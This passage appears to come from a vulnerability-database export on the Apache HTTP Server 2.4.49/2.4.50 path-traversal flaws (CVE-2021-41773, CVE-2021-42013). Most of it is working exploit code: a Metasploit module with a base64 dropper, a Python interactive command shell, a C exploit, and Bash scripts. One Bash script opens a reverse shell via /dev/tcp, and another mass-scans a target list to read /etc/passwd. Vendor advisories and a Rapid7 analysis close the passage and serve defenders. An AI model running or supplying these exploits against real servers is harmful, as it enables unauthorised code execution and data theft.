MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => 
[ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? 
Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36952", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:49:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-11-11T00:00:00", "id": "1337DAY-ID-37030", "href": "https://0day.today/exploit/description/37030", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\n# Exploit Author: Valentin Lobstein\n# Vendor Homepage: https://apache.org/\n# Software Link: https://github.com/Balgogan/CVE-2021-41773\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\n# Tested on: Debian GNU/Linux\n# CVE : CVE-2021-41773 / CVE-2021-42013\n# Credits : Lucas Schnell\n\n\n#!/usr/bin/env python3\n#coding: utf-8\n\nimport os\nimport re\nimport sys\nimport time\nimport requests\nfrom colorama import Fore,Style\n\n\nheader = '''\\033[1;91m\n \n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n 
\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL\n\n\nif len(sys.argv) < 2 :\n print( 'Use: python3 file.py ip:port ' )\n sys.exit()\n\ndef end():\n print(\"\\t\\033[1;91m[!] 
Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\ndef commands(url,command,session):\n directory = mute_command(url,'pwd')\n user = mute_command(url,'whoami')\n hostname = mute_command(url,'hostname')\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \n command = f\"echo; {command};\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n print(output)\n if 'clear' in command:\n os.system('/usr/bin/clear')\n print(header)\n if 'exit' in command:\n end()\n\ndef mute_command(url,command):\n session = requests.Session()\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n return response.text.strip()\n\n\ndef exploitRCE(payload):\n s = requests.Session()\n try:\n host = sys.argv[1]\n if 'http' not in host:\n url = 'http://'+ host + payload\n else:\n url = host + payload \n session = requests.Session()\n command = \"echo; id\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n if \"uid\" in output:\n choice = \"Y\"\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? 
(Y/n) : \")\n if choice.lower() in ['','y','yes']:\n while True:\n commands(url,command,session) \n else:\n end() \n else :\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\n except KeyboardInterrupt:\n end()\n\ndef main():\n try:\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\n payloads = [apache2449_payload,apache2450_payload]\n choice = len(payloads) + 1\n print(header)\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\n while choice >= len(payloads) and choice >= 0:\n choice = int(input('[~] Choice : '))\n if choice < len(payloads):\n exploitRCE(payloads[choice])\n except KeyboardInterrupt:\n print(\"\\n\\033[1;91m[!] Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/37030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-16T05:38:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36937", "href": "https://0day.today/exploit/description/36937", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)\n# Credits: Ash Daulton & cPanel Security Team\n# Exploit Author: TheLastVvV.com\n# Vendor Homepage: https://apache.org/\n# Version: Apache 2.4.50 with CGI enable\n# Tested on : Debian 5.10.28\n# CVE : CVE-2021-42013\n\n#!/bin/bash\n\necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'\nif [ $# -eq 0 ]\nthen\necho \"try: ./$0 http://ip:port LHOST LPORT\"\nexit 1\nfi\ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\"\n\n#usage chmod -x CVE-2021-42013.sh\n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT\n", "sourceHref": "https://0day.today/exploit/36937", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T08:00:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Apache 2.4.50 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37777", "href": "https://0day.today/exploit/description/37777", "sourceData": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <string.h>\n#include <curl/curl.h>\n\n/* Apache 2.4.50 exploit (CVE-2021-42013)\n * Author: Vilius Povilaika\n * Website: www.povilaika.com */\n\n// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013\n\nint usage(char* prog)\n{\n printf(\"Usage: %s <host> <exec>\\n\", prog);\n printf(\" - %s https://127.0.0.1 \\\"uname -a\\\"\\n\", prog);\n return 0;\n}\n\nbool error(const char* reason)\n{\n printf(\"[ERR] Critical error - %s\\n\", reason);\n return false;\n}\n\nstruct callback_result {\n char* data;\n size_t size;\n};\n\nstatic size_t callback(void* pointer, size_t size, size_t nmemb, void* data)\n{\n struct callback_result *memory = (struct callback_result *)data;\n char* ptr = realloc(memory->data, memory->size+nmemb+1);\n memory->data = ptr;\n memcpy(&(memory->data[memory->size]), pointer, nmemb);\n memory->size += nmemb;\n memory->data[memory->size] = 0;\n return nmemb;\n}\n\nbool exploit(void* result, char* host, char* exec)\n{\n CURL *curl = curl_easy_init();\n char url[256];\n sprintf(url, \"%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh\", host);\n curl_easy_setopt(curl, CURLOPT_URL, url);\n char payload[256];\n sprintf(payload, \"echo Content-Type: text/plain; echo; %s\", exec);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);\n curl_easy_setopt(curl, 
CURLOPT_WRITEFUNCTION, callback);\n curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);\n int res = curl_easy_perform(curl);\n if (res != CURLE_OK)\n return error(curl_easy_strerror(res));\n curl_easy_cleanup(curl);\n return true;\n}\n\nint main(int argc, char* argv[])\n{\n if (argc != 3)\n return usage(argv[0]);\n struct callback_result result = {0};\n bool res = exploit(&result, argv[1], argv[2]);\n if (res)\n printf(\"[+] Exploit finished successfully, check output\\n\");\n else\n printf(\"[-] Exploit failed, check output\\n\");\n printf(\" \\n%s\\n\", result.data);\n return 0;\n}\n", "sourceHref": "https://0day.today/exploit/37777", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:52:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "1337DAY-ID-36897", "href": 
"https://0day.today/exploit/description/36897", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.50\n# Tested on: 2.4.50\n# CVE : CVE-2021-42013\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 == '' ]]; [[ $2 == '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\necho ./PoC.sh targets.txt /etc/passwd\necho ./PoC.sh targets.txt /bin/sh id\n\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done\n\n# PoC.sh targets.txt /etc/passwd\n# PoC.sh targets.txt /bin/sh whoami\n", "sourceHref": "https://0day.today/exploit/36897", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:49:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-06T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.49 - Path Traversal Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "1337DAY-ID-36854", "href": "https://0day.today/exploit/description/36854", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.49\n# Tested on: 2.4.49\n# CVE : CVE-2021-41773\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH]\necho ./PoC.sh targets.txt /etc/passwd\nexit\nfi\nfor host in $(cat $1); do\ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done\n", "sourceHref": "https://0day.today/exploit/36854", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "httpd": [{"lastseen": "2022-03-17T19:28:46", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. \n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.51 : Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "HTTPD:E1C40920F9DFC60284EEE7539DA30483", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T17:50:44", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing,\nallowing an external source to DoS the server. This requires a specially crafted request. \n\nThe vulnerability was recently introduced in version 2.4.49. 
No exploit is known to the project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-04T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.50 : null pointer dereference in h2 fuzzing", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2021-10-04T00:00:00", "id": "HTTPD:9BD7C7441A852DCB472C001D2290429F", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-26T17:50:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\n\nThis issue is known to be exploited in the wild.\n\nThis issue only affects Apache 2.4.49 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-29T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.50 : Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-04T00:00:00", "id": "HTTPD:2C849FE5B165E832EE21ADAECFA9521C", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "rapid7blog": [{"lastseen": "2021-10-16T08:58:36", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41773, CVE-2021-42013 | [Apache Advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) | [AttackerKB](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) | Available | ASAP | October 12, 
2021 15:00 ET \n \n\n\n_See the `Updates` section at the end of this post for information on developments that occurred after initial publication._\n\nOn Monday, October 4, 2021, Apache published [an advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) on [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>), an unauthenticated remote file disclosure vulnerability in HTTP Server version 2.4.49 and 2.4.50 (see the `Updates` section for more on 2.4.50). The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. Public proof-of-concept exploit code is widely available, and Apache and others have noted that this vulnerability is being exploited in the wild. Note that a non-default configuration is required for exploitability.\n\nWhile the original advisory indicated that CVE-2021-41773 was merely an information disclosure bug, both [Rapid7](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) and [community](<https://twitter.com/hackerfantastic/status/1445529822071967745>) researchers have verified that the vulnerability can be used for remote code execution **when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) is enabled.** While mod_cgi is not enabled in the default Apache Server HTTP configuration, it\u2019s also not an uncommon feature to enable. With mod_cgi enabled, an attacker can execute arbitrary programs via HTTP POST requests. The initial RCE proof of concept resulted in blind command execution, and there have been multiple proofs of concept that coerce the HTTP server into sending the program\u2019s output back to the attacker. 
